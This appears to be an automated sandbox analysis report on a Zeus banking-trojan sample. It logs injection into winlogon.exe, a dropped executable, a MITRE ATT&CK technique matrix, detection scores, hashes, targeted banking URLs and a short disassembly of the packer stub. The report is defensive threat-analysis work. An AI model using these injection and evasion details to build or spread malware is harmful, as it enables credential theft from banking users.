Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CED4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CED6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CED8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D001000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D014000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D016000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D018000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D021000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D034000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D036000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D038000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D041000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D054000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D056000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D058000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D061000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D074000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D076000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D078000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_00412BFD InitializeSecurityDescriptor,SetSecurityDescriptorDacl
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_0040A8E2 RtlAllocateHeap,CreateNamedPipeW,CreateEventW,CreateEventW,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_0040F233 GetSystemTime,SystemTimeToFileTime,__aulldiv
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_0040AC42 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_0040F272 GetTimeZoneInformation
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_00412CCE GetTickCount,GetVersionExW,GetUserDefaultUILanguage,GetModuleFileNameW
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_004106C8 socket,bind,listen,closesocket
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_00410986 socket,bind,closesocket

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts 1 | Native API 1 | Valid Accounts 1 | Valid Accounts 1 | Masquerading 2 | Input Capture 11 | System Time Discovery 2 | Remote Services | Input Capture 11 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
| Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 11 | Valid Accounts 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Application Shimming 1 | Process Injection 42 | Virtualization/Sandbox Evasion 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 11 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Application Shimming 1 | Process Injection 42 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Install Root Certificate 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | System Information Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| glGb1KYfX6.exe | 88% | Virustotal | | Browse |
| glGb1KYfX6.exe | 91% | ReversingLabs | Win32.Trojan.Zeus | |
| glGb1KYfX6.exe | 100% | Avira | TR/ATRAPS.Gen2 | |
| glGb1KYfX6.exe | 100% | Joe Sandbox ML | | |

Dropped Files

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Windows\SysWOW64\sdra64.exe | 100% | Avira | TR/ATRAPS.Gen2 | |
| C:\Windows\SysWOW64\sdra64.exe | 100% | Joe Sandbox ML | | |

Unpacked PE Files

2.2.winlogon.exe.d7a0000.116.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.df20000.176.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efe0000.310.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10680000.491.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f1a0000.324.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f960000.386.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.103e0000.470.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ea40000.265.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cc80000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f720000.368.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dc40000.153.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cf60000.50.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f80000.563.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10aa0000.524.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10280000.459.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ec40000.281.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cea0000.44.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f2e0000.334.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e880000.251.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e3a0000.212.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11380000.595.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca60000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10c80000.539.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10300000.463.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fbe0000.406.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f940000.385.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f240000.329.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.108e0000.510.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
https://bc.nsk. | 0% | Avira URL Cloud | safe |
https://onlineeast#.bankofamerica.com/cgi-bin/ias/ | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.faktura.ru/enter.jsp?site= | glGb1KYfX6.exe, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmp | false | | high
https://bc.nsk. | winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.faktura.ru/enter.jsp?site=%S | glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmp, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmp | false | | high
https://onlineeast#.bankofamerica.com/cgi-bin/ias/ | glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:368363
      Start date:14.03.2021
      Start time:03:02:11
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 23s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:glGb1KYfX6 (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:22
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.evad.winEXE@1/2@0/0
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 95.4% (good quality ratio 90.2%)
      • Quality average: 83.3%
      • Quality standard deviation: 27.6%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      Warnings:
      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtWriteVirtualMemory calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Windows\SysWOW64\sdra64.exe
      Process:C:\Users\user\Desktop\glGb1KYfX6.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):529408
      Entropy (8bit):7.446899077949846
      Encrypted:false
      SSDEEP:12288:/1ekq9qv+41dEAMY535cZoBg0r20v4YkA3ieEMLnZg:/ckAmaAF32f0r2w4kLLG
      MD5:F4B5E29A4AB7133AA34463A01F313CC0
      SHA1:9AEBA004BA54F3800FD95C97B6E2FBF774E881B2
      SHA-256:3DB80A4033B4F71879C44264AE29444400FC94C902BFE706870218425BB0F13F
      SHA-512:4FC0730662207D94376FA7A5CF4A4DF15C887E3754929EA9C6B1020A10DF21EB8670C1F89C399CBAC7B694745BF16A0B1BBD222F10A9B447FC4923C0C3BC9968
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:low
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q>.V._..._..._.....~_...\..._......._..8.G.^_...q..._...X_.5_..P.>.._..Rich._..................PE..L...g..G.....................D...............0....@..........................................................................:..x....................................................................................0..@............................text............................... ..`.rdata...A...0...B..................@..@.data...F............\..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Windows\SysWOW64\sdra64.exe:Zone.Identifier
      Process:C:\Users\user\Desktop\glGb1KYfX6.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview: [ZoneTransfer]....ZoneId=0

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.854645796088476
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:glGb1KYfX6.exe
      File size:89600
      MD5:8944bc22235936b73bdf874bfa4d1a64
      SHA1:6f48fb18ffd6497fbdc951b4d96340e878921d91
      SHA256:d1bf7ec60bcb74dd395f92a1ddb5a2a66e9913514e0f7428681e9a8d7fe25b1e
      SHA512:e3d637bdb3d5c4fda8a34eb3f47bdee837c514c5481067cf8c20a523430ca2b5bcd8ea20c5c79d7ea3c627b214cf89dc59c96c6d1a3983f6c77a489c489de9c2
      SSDEEP:1536:lTSvBFUz/BK0IUzdpQJ4anbsbeoXBbvLRb0JJlBQx7IlPuo/SfDEhxDEhv+143xo:lCF0K0IipQJzbsttLRbKJXQx7OuoafD2
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q>.V._..._..._......~_...\..._......._..8.G.^_...q..._...X_.5_..P.>.._..Rich._..................PE..L...g..G...................

      File Icon

      Icon Hash:00828e8e8686b000

      Static PE Info

      General

      Entrypoint:0x40aba8
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
      Time Stamp:0x471C8667 [Mon Oct 22 11:15:51 2007 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:4c317a879868b941a965444eede73069

      Entrypoint Preview

      Instruction
      call dword ptr [00413154h]
      cmp eax, 00000000h
      jne 00007F474527B25Bh
      push eax
      mov eax, esp
      push eax
      push 000000FBh
      push eax
      push eax
      call dword ptr [00413840h]
      push ebx
      mov ebx, eax
      call 00007F474527B246h
      ret
      mov eax, 00011E13h
      sub eax, 000D4A19h
      add eax, 000D4BA3h
      mov ecx, edx
      sub esp, 04h
      mov dword ptr [esp], ecx
      sub esp, 04h
      mov dword ptr [esp], 00000040h
      push 00003000h
      push eax
      sub esp, 04h
      mov dword ptr [esp], 00000000h
      call dword ptr [00413814h]
      mov ecx, dword ptr [esp]
      add esp, 04h
      mov ecx, esi
      mov esi, dword ptr [esp]
      add esi, 000000B4h
      mov edi, eax
      mov ecx, 000001E3h
      push eax
      mov edx, 0470E26Dh
      add dl, bl
      xor ebp, ebp
      sub esp, 04h
      mov dword ptr [esp], edx
      push edx
      mov bh, byte ptr [esi]
      add bh, byte ptr [esp+04h]
      add byte ptr [edi], bh
      pop edx
      pop edx
      inc esi
      sub edi, 0001A485h
      add edi, 0001A486h
      xor eax, eax
      sub eax, 000758B9h
      add eax, 000758BDh
      inc ebp
      shr edx, 08h
      cmp eax, ebp
      jne 00007F474527B24Eh
      mov ebp, 0470E26Dh
      mov edx, ebp
      mov ebp, 00000000h
      add dl, bl
      sub ecx, 000A10FDh
      add ecx, 000010FCh

      Data Directories

      Name | Virtual Address | Virtual Size | Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13a00 | 0x78 | .rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x940 | .rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

      Sections

      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
      .text | 0x1000 | 0x1141e | 0x11600 | False | 0.838621290468 | data | 6.93746073005 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
